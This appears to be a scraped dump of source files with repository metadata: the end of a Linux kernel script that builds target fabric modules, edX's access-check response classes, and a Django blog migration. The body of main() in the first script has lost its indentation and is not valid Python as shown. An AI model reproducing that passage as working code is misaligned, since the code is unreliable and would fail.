    entry = "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name.lower() + "/\n"
    makefile_path = tcm_dir + "/drivers/target/Makefile"
    with open(makefile_path, 'a') as makefile:
        makefile.write(entry)
    return
def tcm_mod_add_kconfig(tcm_dir, fabric_mod_name):
    # Append a source directive for the new module's Kconfig to the top-level
    # drivers/target Kconfig so its config option becomes visible.
    entry = "source \"drivers/target/" + fabric_mod_name.lower() + "/Kconfig\"\n"
    kconfig_path = tcm_dir + "/drivers/target/Kconfig"
    with open(kconfig_path, 'a') as kconfig_file:
        kconfig_file.write(entry)
    return
def main(modname, proto_ident):
# proto_ident = "FC"
# proto_ident = "SAS"
# proto_ident = "iSCSI"
tcm_dir = os.getcwd();
tcm_dir += "/../../"
print "tcm_dir: " + tcm_dir
fabric_mod_name = modname
fabric_mod_dir = tcm_dir + "drivers/target/" + fabric_mod_name
print "Set fabric_mod_name: " + fabric_mod_name
print "Set fabric_mod_dir: " + fabric_mod_dir
print "Using proto_ident: " + proto_ident
if proto_ident != "FC" and proto_ident != "SAS" and proto_ident != "iSCSI":
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
ret = tcm_mod_create_module_subdir(fabric_mod_dir)
if ret:
print "tcm_mod_create_module_subdir() failed because module already exists!"
sys.exit(1)
tcm_mod_build_base_includes(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_scan_fabric_ops(tcm_dir)
tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_configfs(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kbuild(fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kconfig(fabric_mod_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Makefile..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kbuild(tcm_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Kconfig..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kconfig(tcm_dir, fabric_mod_name)
return
# ---- script entry ---------------------------------------------------------
# NOTE(review): the option parsing below runs at import time, not under the
# __main__ guard — importing this file as a module would parse sys.argv and
# possibly call exit().  Left as-is, since moving it into the guard would
# change module-level side effects.
parser = optparse.OptionParser()
parser.add_option('-m', '--modulename', help='Module name', dest='modname',
                  action='store', nargs=1, type='string')
parser.add_option('-p', '--protoident', help='Protocol Ident', dest='protoident',
                  action='store', nargs=1, type='string')

(opts, args) = parser.parse_args()

# Both -m and -p are required; optparse has no native "required option"
# support, so enforce it by hand.
mandatories = ['modname', 'protoident']
for m in mandatories:
    if not opts.__dict__[m]:
        print "mandatory option is missing\n"
        parser.print_help()
        exit(-1)

if __name__ == "__main__":
    main(str(opts.modname), opts.protoident)
| gpl-2.0 |
jamiefolsom/edx-platform | lms/djangoapps/courseware/access_response.py | 87 | 4737 | """
This file contains all the classes used by has_access for error handling
"""
from django.utils.translation import ugettext as _
from xmodule.course_metadata_utils import DEFAULT_START_DATE
class AccessResponse(object):
    """Class that represents a response from a has_access permission check."""

    def __init__(self, has_access, error_code=None, developer_message=None, user_message=None):
        """
        Creates an AccessResponse object.

        Arguments:
            has_access (bool): if the user is granted access or not
            error_code (String): optional - default is None. Unique identifier
                for the specific type of error
            developer_message (String): optional - default is None. Message
                to show the developer
            user_message (String): optional - default is None. Message to
                show the user
        """
        self.has_access = has_access
        self.error_code = error_code
        self.developer_message = developer_message
        self.user_message = user_message
        if has_access:
            # A granted response must not carry an error code.
            assert error_code is None

    def __nonzero__(self):
        """
        Overrides bool() (Python 2 truthiness hook).

        Allows for truth value testing of AccessResponse objects, so callers
        who do not need the specific error information can check if access
        is granted.

        Returns:
            bool: whether or not access is granted
        """
        return self.has_access

    # Python 3 name for the truthiness hook.  Without this alias, bool() on
    # an AccessResponse would always be True under Python 3, silently
    # granting access in truth-value tests.
    __bool__ = __nonzero__

    def to_json(self):
        """
        Creates a serializable JSON representation of an AccessResponse object.

        Returns:
            dict: JSON representation
        """
        return {
            "has_access": self.has_access,
            "error_code": self.error_code,
            "developer_message": self.developer_message,
            "user_message": self.user_message
        }
class AccessError(AccessResponse):
    """
    An AccessResponse for the denied case (has_access is False).

    Carries the error code plus developer- and user-facing messages;
    concrete subclasses represent the specific denial reasons.
    """

    def __init__(self, error_code, developer_message, user_message):
        """
        Build a denied-access response.

        Arguments:
            error_code (String): unique identifier for the specific type of
                error
            developer_message (String): message to show the developer
            user_message (String): message to show the user
        """
        super(AccessError, self).__init__(
            has_access=False,
            error_code=error_code,
            developer_message=developer_message,
            user_message=user_message,
        )
class StartDateError(AccessError):
    """
    Access denied because the course has not started yet and the user
    is not staff
    """

    def __init__(self, start_date):
        # When the course still has the placeholder default start date,
        # avoid exposing that date in the messages.
        if start_date == DEFAULT_START_DATE:
            dev_msg = "Course has not started"
            usr_msg = _("Course has not started")
        else:
            dev_msg = "Course does not start until {}".format(start_date)
            usr_msg = _("Course does not start until {}"  # pylint: disable=translation-of-non-string
                        .format("{:%B %d, %Y}".format(start_date)))
        super(StartDateError, self).__init__("course_not_started", dev_msg, usr_msg)
class MilestoneError(AccessError):
    """
    Access denied because the user has unfulfilled milestones
    """

    def __init__(self):
        super(MilestoneError, self).__init__(
            "unfulfilled_milestones",
            "User has unfulfilled milestones",
            _("You have unfulfilled milestones"),
        )
class VisibilityError(AccessError):
    """
    Access denied because the user does have the correct role to view this
    course.
    """

    def __init__(self):
        super(VisibilityError, self).__init__(
            "not_visible_to_user",
            "Course is not visible to this user",
            _("You do not have access to this course"),
        )
class MobileAvailabilityError(AccessError):
    """
    Access denied because the course is not available on mobile for the user
    """

    def __init__(self):
        super(MobileAvailabilityError, self).__init__(
            "mobile_unavailable",
            "Course is not available on mobile for this user",
            _("You do not have access to this course on a mobile device"),
        )
| agpl-3.0 |
kozmo12345/zm | zmBlog/migrations/0001_initial.py | 1 | 1904 | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-09-04 08:55
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated initial migration (Django 1.10, 2016-09-04): creates the
    # Article and Comment tables for the blog app.  Applied migrations should
    # not be hand-edited; schema changes belong in a new migration.

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Article',
            fields=[
                ('article_id', models.AutoField(editable=False, primary_key=True, serialize=False)),
                ('category', models.IntegerField(default=0)),
                ('article_title', models.CharField(max_length=300)),
                ('article_text', models.TextField()),
                # NOTE(review): creation and modification timestamps both
                # carry verbose_name 'date published' — presumably copied
                # from the model definition; harmless to the schema but
                # confusing in admin forms.  Confirm against the model.
                ('cre_date', models.DateTimeField(verbose_name='date published')),
                ('mod_date', models.DateTimeField(verbose_name='date published')),
                ('cre_user', models.CharField(max_length=300)),
                ('mod_user', models.CharField(max_length=300, null=True)),
                ('pub_date', models.DateTimeField(null=True)),
                ('status', models.IntegerField(default=0)),
                ('like', models.IntegerField(default=0)),
                ('dislike', models.IntegerField(default=0)),
            ],
        ),
        migrations.CreateModel(
            name='Comment',
            fields=[
                ('comment_id', models.AutoField(editable=False, primary_key=True, serialize=False)),
                # NOTE(review): article_id is a plain IntegerField, not a
                # ForeignKey — there is no DB-level referential integrity
                # between Comment and Article.
                ('article_id', models.IntegerField()),
                ('comment_text', models.CharField(max_length=300)),
                ('cre_date', models.DateTimeField(verbose_name='date published')),
                ('mod_date', models.DateTimeField(verbose_name='date published')),
                ('cre_user', models.CharField(max_length=300)),
                ('mod_user', models.CharField(max_length=300, null=True)),
                ('status', models.IntegerField(default=0)),
            ],
        ),
    ]
| gpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.